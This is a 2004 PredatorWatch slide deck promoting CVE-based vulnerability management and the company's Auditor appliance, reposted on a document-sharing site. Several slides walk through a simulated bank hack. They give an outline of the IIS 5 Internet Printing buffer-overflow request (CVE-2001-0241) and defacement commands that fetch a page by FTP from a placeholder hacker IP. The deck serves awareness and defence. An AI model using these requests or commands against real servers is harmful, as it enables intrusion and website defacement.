Proactive Network Security:

bubblesradiographerΔιακομιστές

4 Δεκ 2013 (πριν από 3 χρόνια και 8 μήνες)

95 εμφανίσεις


Proactive Network Security:

Do You Speak CVE?

Gary S. Miliefsky, CISSP®, FMDHS

President & CEO, PredatorWatch, Inc.

E
-
mail:
garym@predatorwatch.com


November 23, 2004


PredatorWatch, Inc. is a DoD Contractor


Copyright © 2004 PredatorWatch, Inc.


Page
2


About Me

Gary S. Miliefsky



20+ Security Veteran



Computer Scientist



CISSP®



DHS is funding CVE® at MITRE


(I am a founding member)

Copyright © 2004 PredatorWatch, Inc.


Page
3


Behind the firewall…a gift from a friend?

Copyright © 2004 PredatorWatch, Inc.


Page
4


It Doesn’t Take a Rocket
-
Scientist





Copyright © 2004 PredatorWatch, Inc.


Page
5


Hackers Cause Risk of Non
-
compliance


Government (Executive Order 13231)


Legal (HIPAA, GLBA, E
-
SIGN)


Health Care & Pharmaceutical (HIPAA and CFR
FDA 21
-

11)


Banking and Finance (E
-
SIGN, GLBA, FDIC
Audits)


Higher Education (Due Care and Tort Law)


These markets are being heavily attacked by Hackers on a daily basis.

Copyright © 2004 PredatorWatch, Inc.


Page
6


If You Currently Have…


Anti
-
Virus Software and a Solid Firewall


Access through Virtual Private Network (VPN)


Internet Service Provider (ISP) Spam Protection


Local Browser/Email/JavaScript Protection


Passwords for Email on Your Network


Encryption Servers (IPSEC, SSL/TLS, HTTPS)


Public Key Infrastructure (PKI)

Encryption


Content Proxy (for filtering, Internet acceleration)


Intrusion Detection or Prevention Systems

(IDS or IPS)


Copyright © 2004 PredatorWatch, Inc.


Page
7


…Is Your Network Safe?


In short, NO. These “solutions” don’t stop
Hackers.


Hackers take advantage of common
vulnerabilities and exposures in your network.


Firewalls can be hard to manage, so they may
not protect you. And they don’t protect you
from internal threats.


Intrusion Detection Systems require human
intervention and generate false results.


Intrusion Prevention Systems may block
legitimate access.


Copyright © 2004 PredatorWatch, Inc.


Page
8


Are You Stopping the Hackers?


Anti
-
virus software can only protect against
know viruses

it cannot stop hacker access!


Passwords often don’t stop clever hackers,
who use readily downloadable tools that
crack them.


Turning off JavaScript doesn’t stop a hacker
from running other types of code on your
system.


Hackers can break into Virtual Private
Networks (VPNs)

they aren’t always private!


Firewalls can be points of entry for hackers.


Copyright © 2004 PredatorWatch, Inc.


Page
9


What Damage Can Hackers Cause?


Denial of Service (DoS)


Destruction of Data


Theft of Data


Damage to Your Reputation


Put Your at Risk of Legal Liability

Copyright © 2004 PredatorWatch, Inc.


Page
10


Hackers Can Deny You Access


Stop services

Vital programs you need
to have running


Kill the server

Bringing it down, forcing
your network, even your company, to a
halt


Change the administrator password,
locking out your system administrator
and letting themselves in to key systems
and files


Copyright © 2004 PredatorWatch, Inc.


Page
11


Hackers Can Destroy Data


Crash your system or a node on the network,
causing productivity issues and data loss


Send garbage data to the system


Defeat protocols that use date/time of day to
gain access to the system


Execute PHP code existing on the system


Execute commands as administrator

erasing
data, altering access

Creating havoc




Copyright © 2004 PredatorWatch, Inc.


Page
12


Hackers Can Steal Private Data


Enter your network and retrieve

system info


Read sensitive files on the system


Get version numbers of installed
software and attack using that
information


Obtain access to accounts and private
data


Copyright © 2004 PredatorWatch, Inc.


Page
13


Serious Network Protection


How Do You Keep out the Hackers?


Analyzes Your Network’s Vulnerabilities on a
Regular Basis (CVEs)


Regularly Review Those Vulnerabilities (CVEs)


Tune your Firewall against CVE exploits


Harden your Assets by Removing CVEs


Make Sure Your Methods are “Tamper
-
proof”



Optimized Model Automation of this process is
patent
-
pending by PredatorWatch, Inc.

Copyright © 2004 PredatorWatch, Inc.


Page
14


What is the CVE Standard?


Common Vulnerabilities and Exposures (CVE) is a
list

or
dictionary that provides common names for publicly known
information security vulnerabilities and exposures. Using a
common name makes it easier to share data across separate
databases and tools that until now were not easily integrated.
This makes CVE the key to information sharing. If a report from
one of your security tools incorporates
CVE names
, you may
then quickly and accurately access fix information in one or
more separate
CVE
-
compatible

databases to remediate the
problem.


CVE is:


One
name

for one vulnerability or exposure


One standardized description for each vulnerability or exposure


A
dictionary

rather than a database


How disparate databases and tools can "speak" the same language


The way to interoperability and better security coverage


A basis for evaluation among tools and databases


Accessible for
review

or
download

from the Internet


Industry
-
endorsed via the CVE
Editorial Board


Copyright © 2004 PredatorWatch, Inc.


Page
15


PredatorWatch is CVE Compatible

Left to right:

Lawrence C. Hale, U.S. Department of Homeland Security, Deputy Director,
US
-
CERT

delivers 3 CVE Mitre Compliance Certificates to PredatorWatch, Inc.
at
CSI, Nov 8, 2004, Washington, D.C.

Gary S. Miliefsky, CISSP, FMDHS, CEO, PredatorWatch, Inc.

Doug Eames, VP of Sales, PredatorWatch, Inc.

Copyright © 2004 PredatorWatch, Inc.


Page
16


Keep Up to Date on CVEs


Visit
http://cve.mitre.org


Keep an eye on the SANS/FBI top 20 CVE list
http://www.sans.org/top20/


Test for the latest CVEs on a daily basis


Report on your CVEs on a daily, weekly or
monthly basis (DUE DILIGENCE)


Remove all CVEs that you possibly can (DUE
CARE)


Block at the Firewall (INCREASE UPTIME)

E
-
commerce Real World Scenario:



1.
What if you were the CEO, CFO, CIO or CSO
of an E
-
commerce Merchant or a Brick &
Mortar Retailer using an Internet Payment
Gateway System?

2.
What if you had only one CVE in your system?

3.
What if
anyone

could exploit it in 5 minutes?


Copyright © 2004 PredatorWatch, Inc.


Page
18


CVEs in e
-
Commerce


VISA Announces vulnerability audit requirements (CISP)


Over 21,000
-
member financial institutions, VisaNet processes
over 2,700 transactions/sec during peak season.



MasterCard requires Quarterly CVE Audits beginning 6/2004 (SDP)


7% of all of MasterCard's $921.6 billion annual card purchases
take place on web



Now AMEX (DSS) and Discover (DISC) have launched Audit
requirement programs.



Soon, all e
-
Commerce Merchants must detect/remove critical CVEs
to do business on line

(see page 49 of MasterCard SDP PDF for
example)

SOURCE: COMPUTERWORLD, April 14, 2004

Copyright © 2004 PredatorWatch, Inc.


Page
19


What You Should Do To Comply

1.
Build Corporate Security Policies that are
ISO17799 compliant:


American Express DSS


DiscoverCard DISC


MasterCard SCP


VISA CISP


2.
Audit and Report on CVEs


Required by all Credit Card Companies



Copyright © 2004 PredatorWatch, Inc.


Page
20


What Is The ISO 17799 Standard?


10 Sections


Security Policy



To provide management direction & support for information
security


Organizational Security



Manage information security within the organization


Asset Classification and Control


To maintain appropriate protection of
organizational assets


Personnel Security



To reduce the risk of human error, theft, fraud or misuse
of facilities


Physical & Environmental Security


To prevent unauthorized access,
damage and interference to business premises and information


Communications and Operations Management



To ensure the correct and
secure operations of information processing facilities


Access Control



Control access to information


System Development and Maintenance



To ensure security is built into
information systems


Business Continuity Management


To counteract interruptions to business
activities and to protect critical business processes from the effects of major
failures or disasters


Compliance



To avoid breaches of any criminal and civil law, statutory,
regulatory or contractual

Online Banking Real World Scenario:



1.
What if you were the CEO, CFO, CIO or CSO
of Fidelity Trust Bank with $1B under
management?

2.
What if you had only one CVE in your system?

3.
What if
anyone

could exploit it in 5 minutes?


Copyright © 2004 PredatorWatch, Inc.


Page
22


Welcome to FidelityTrustBank.com

Copyright © 2004 PredatorWatch, Inc.


Page
23


FidelityTrustBank.com has CVEs

Copyright © 2004 PredatorWatch, Inc.


Page
24


Objectives: Find and Remove CVEs


“The most important step towards securing
your network is to shrink the window of
vulnerability as close to zero as possible.
No vulnerabilities means no place to
hack.”


If you don’t:

Hackers
will

take advantage of you.


Copyright © 2004 PredatorWatch, Inc.


Page
25


Hacking an Online Bank


The Break In

The break
-
in (excerpt from CNET News.com:
http://news.com.com/2009
-
1017
-
893228.html
):

“One strategy is to attack the hardware itself, exploiting notoriously glitch
-
prone Web systems to gain access to the servers running the bank's online
operations.

"Most banks run Unix Web servers or Microsoft IIS (Internet Information
Server), and both are prone to remote attacks that can allow a hacker to
take control of the server itself," said David Ahmad, the moderator of the
Bugtraq

mailing list, one of the leading e
-
mail lists dedicated to reports of
software vulnerabilities.

Companies including financial institutions subscribe to the list. In April,
Microsoft
issued

a security patch to plug 10 new holes that could allow
hackers to take full control of computers running the company's IIS
program.”

Do NOT try this at home. It’s Illegal.

Copyright © 2004 PredatorWatch, Inc.


Page
26


The Break In (continued)

“In seizing control of a server, security experts say, a hacker can
also modify any trusted applications to perform malicious
operations. An attack that manipulates such internal applications is
more likely to escape notice by the network's electronic guards.

"Intrusion
-
detection systems only spot known attacks or behaviors
that indicate a certain class of attack," Ahmad said. "Attacks
against a server might be detected, but a complex application
-
based attack might look like normal behavior."

Financial institutions do make it difficult for employees to move
money, but their systems must be flexible enough to work with
customers who are not subject to the same level of scrutiny. This
could allow an insider to create a fake customer transaction and
authorization to shepherd the money right out of a system. “


CNET News.com

Copyright © 2004 PredatorWatch, Inc.


Page
27


Hacking Methodology


Exploit CVEs


Footprint


Scan


Enumerate


Penetrate


Escalate


Pillage


Get Interactive


Expand influence


Cleanup


(Denial of Service)



In this presentation, I
will

assume that the first
two steps have been done by PredatorWatch

Deface Website and Steal
Database from simulated Bank

Focus of this presentation, with
only one specific example

Copyright © 2004 PredatorWatch, Inc.


Page
28


Common IIS 5 Attacks Against CVEs

Here are the most dangerous IIS 5 attacks
currently:


Buffer overflows


File System Traversal


Script source revelation

Hackers take
advantage of this
flaw in the online
Bank

Copyright © 2004 PredatorWatch, Inc.


Page
29


Buffer Overflow CVE in IIS v5.0


CVE
-
2001
-
0241


CVE Version: 20040901

This is an entry on
the
CVE list
, which standardizes names for
security problems. It was reviewed and
accepted by the
CVE Editorial Board

before it
was added to CVE.


Name: CVE
-
2001
-
0241


Description: Buffer overflow in Internet Printing
ISAPI extension in Windows 2000 allows remote
attackers to gain root privileges via a long print
request that is passed to the extension through
IIS 5.0.


Copyright © 2004 PredatorWatch, Inc.


Page
30


CVE In Detail: IIS Buffer Overflow: IPP


Internet Printing Protocol (IPP)
functionality is implemented in IIS 5 via
an ISAPI filter
(C:
\
WINNT
\
System32
\
msw3prt.dll)


This functionality is enabled by default


Malformed requests for .printer files
invoke this ISAPI and cause a buffer
overflow, resulting in remote SYSTEM
privileges

Copyright © 2004 PredatorWatch, Inc.


Page
31


CVE Exploit: IIS Buffer Overflows: IPP


Simple to exploit:


GET /null.printer HTTP/1.0

Host: [
> 420 char. buffer
]

Copyright © 2004 PredatorWatch, Inc.


Page
32


Deface Online Bank (Simulation)

Before

After

C:
\
>
ftp [hacker
-
ip]

C:
\
>
get hack
-
index.html

C:
\
>
rename index.html

Copyright © 2004 PredatorWatch, Inc.


Page
33


IIS5 Attack
Countermeasures

1.
IIS5 Checklist (microsoft.com/security)

2.
Visit http://www.windowsupdate.com on
a regular basis

3.
Install all necessary security and
system patches as required


Repeat Steps 1
-
3 Religiously!

Copyright © 2004 PredatorWatch, Inc.


Page
34




Recommends…

THIS ONE IS CRITICAL

Copyright © 2004 PredatorWatch, Inc.


Page
35


Get Computer Updates…

…Means CVE Management


Every day there is a new CVE (Common
Vulnerability and Exposure) see
http://cve.mitre.org


This website /
\

is
The

homepage for
helping you stop hackers and harden your
assets. Why?


By knowing the CVEs, if you find a system
with a CVE, then you can find a way to
block an exploit that would impact this
asset.

Copyright © 2004 PredatorWatch, Inc.


Page
36


Protect Against CVE Exploiters


Detect and Track Assets


Policy


What to do if offline, I/O, VPN, etc.


Process


Equip I/O, Laptops, etc.


Audit your Network for CVEs:


Careful with free tools


may DoS yourself!


Lock The Doors against CVE Exploits


Manage your firewall, daily.


Cleanup your CVEs

Copyright © 2004 PredatorWatch, Inc.


Page
37


Protect Against CVE Exploiters


Detect and Track Assets


Laptops in and out of the office


Personal computer or Company asset?


Firewall, Antivirus, Antispyware, Patches up to date?


Inbound scan for CVEs


high risk? then quarantine.


Wireless Routers/LANs


How many in the building? Encrypted?
Authenticated?


Servers and other equipment


Something new on the LAN? Who owns it?


Something offline repeatedly? Why?



Copyright © 2004 PredatorWatch, Inc.


Page
38


Protect Against CVE Exploiters


Audit your Network for CVEs:


Find a tool you like…


Google “Laptop Auditor” or “Security Auditor”


Do an eval of Open Source vs Turnkey


If you built your Firewall from scratch


go for Open
Source, else, find a Company you can work with and
trust.


Pick a tool that doesn’t take any assets offline


Scans and reports on CVEs

Copyright © 2004 PredatorWatch, Inc.


Page
39


Protect Against CVE Exploiters


Lock The Doors against CVE Exploits


Review logs


look for suspicious traffic


Make sure you setup the VPN interface properly and know
who’s using it and if they are coming in through a secure
tunnel on an insecure or ‘sick’ computer


Block ports for all inbound/outbound that you don’t use


445
was exploited by MSBlast and Sasser. Do you need it
open?


Look at the computers that have CVEs


how long to fix and
what port is it on? Update your rules table until it is fixed.


Don’t trust all patches. Reinspect for same or new CVEs


Keep repeating this process, daily.

Copyright © 2004 PredatorWatch, Inc.


Page
40


Protect Against CVE Exploiters


Cleanup your CVEs


Remember the IIS 5.0 vulnerability?


Did the patch fix it? Yes, good. No? Then, why not shut
off the web
-
based print server feature of the IIS server


one quick configuration change and no CVE to exploit.


Some CVEs can be patched


Others required intelligent reconfiguration


Security by Obscurity (usually a no
-
no) may
actually delay a successful attack against a CVE
until you have a chance to shut down the service,
update the firewall rules table or fix the CVE.

Copyright © 2004 PredatorWatch, Inc.


Page
41


AN INDUSTRY FIRST
-

CLIENTLESS

QUARANTINE SYSTEM

Auditor™ is the world’s first clientless
quarantine system that drives firewalls to
do a better job, while at the same time,
enables IT Managers, Network Security
Consultants and Managed Security
Service Providers (MSSPs) to harden
networks and show best practices for
regulatory compliance.

Introducing PredatorWatch Auditor™…

Copyright © 2004 PredatorWatch, Inc.


Page
42


PredatorWatch Auditor™ Automates…


Detection and Tracking of Assets


Auditing your Network for CVEs:


Locking The Doors against CVE Exploits


Cleanup your CVEs

Copyright © 2004 PredatorWatch, Inc.


Page
43


Auditor™ Features

n
World’s Fastest CVE® Vulnerability Assessment Engine

n
Secure Vulnerability Update Server

n
Dynamic Rogue Wireless and Laptop Detector

n
Immediate Audits and On Demand Audits

n
Patent
-
pending FirewallBooster™ for major firewalls

n
PatchBooster™ for Microsoft® SUS

n
Asset Tracker with built
-
in MAC/IP Tracker™

n
Security Policy Builder with ISO®17799 Templates

n
Patent
-
pending Regulatory Compliance Reporter




Copyright © 2004 PredatorWatch, Inc.


Page
44



Auditor™ Benefits

n
Automatically detects, audits, quarantines and remediates

against
all your computers, servers, desktops, laptops, network
equipment and wireless routers by tight integration with the
firewall.



n
Protects your network behind the firewall

from common
vulnerabilities and exposures, through frequent, rapid and
automated vulnerability assessment, patch management and
remediation.


n
Extending the timetable to remediate
, by automatically
reconfiguring the firewall at port and IP level, allowing
organizations to patch during normally scheduled maintenance
windows, rather than during inconvenient and costly intervals.


n
Helps enforce policy and ensure regulatory compliance

by
constantly auditing corporate security standard

configurations to reduce risk.

Copyright © 2004 PredatorWatch, Inc.


Page
45


Finally, a turnkey security solution that really
works for the SME marketplace.



Jon Oltsik, Senior Analyst

The laptop and wireless detection and
quarantine feature is unique.



Chris Shipley, Executive Producer, DemoMobile

It’s a streamlined vulnerability management
solution with features of a CIO in a box.



Charles Kolodgy, Research Director, Security Products


The missing link in network security, behind the
firewall, for the small to medium size enterprise.



James Hurley, Vice President, Security & Privacy Research


A powerful security solution that is simple to use,
easy to deploy and requires little to no training.



Phebe Waterfield, Security Analyst


What Analysts Are Saying…

Copyright © 2004 PredatorWatch, Inc.


Page
46


…And Partners

... a phenomenal
technology/solution. Simply
amazing!


-

David Trudeau, Director of Sales


Auditor™ turns an IBM xSeries
into a powerful security
appliance.


-

Jim Stallings, Senior Vice President


Copyright © 2004 PredatorWatch, Inc.


Page
47


Banking/GLBA

Insurance/HIPAA

Education/E
-
Sign

“Inside our firewall, our Auditor™ security appliance
detects and diagnoses potential security flaws that
could cause our bank to be at risk of FDIC IT
Security Audit and GLBA noncompliance…We are
very pleased with the Auditor™.”



-

Steve Irish, CIO, Enterprise Bank & Trust Co.

“...it is quite common for faculty/staff/students to
plug into computer system without my knowledge...
Auditor™ gives me the ability to get a quick
inventory of which systems are new to the network
and automatically quarantine those that are at risk.”

-

Kenneth Kleiner, Systems & Network Manager,
UMASS Lowell

“With Auditor™ on our network, we get regular
validation that we are protected against attack and
enjoy a significant increase in security.”

-

William Tyson, SVP, AGIA

…And Customers

Copyright © 2004 PredatorWatch, Inc.


Page
48


We Are The Technology Leader…

1.
The only Vulnerability Management player to develop the patent
-
pending Firewall Booster™ technology to tie and unify Firewall and
Vulnerability Management together.


2.
The first to dynamically detect rogue and high risk assets (mobile
& wireless) and intelligently quarantine at the Firewall.


3.
The only Vulnerability Management player to expand into
Enterprise Security Management with asset management, policy
building, patch boosting and regulatory compliance reporting.


4.
The first and only to fit on a Compact Flash, a 1U and the IBM
BladeCenter.

PredatorWatch, Inc.

Copyright © 2004 PredatorWatch, Inc.


Page
49


Questions?

Note: Click the logo (above) to visit our Company website.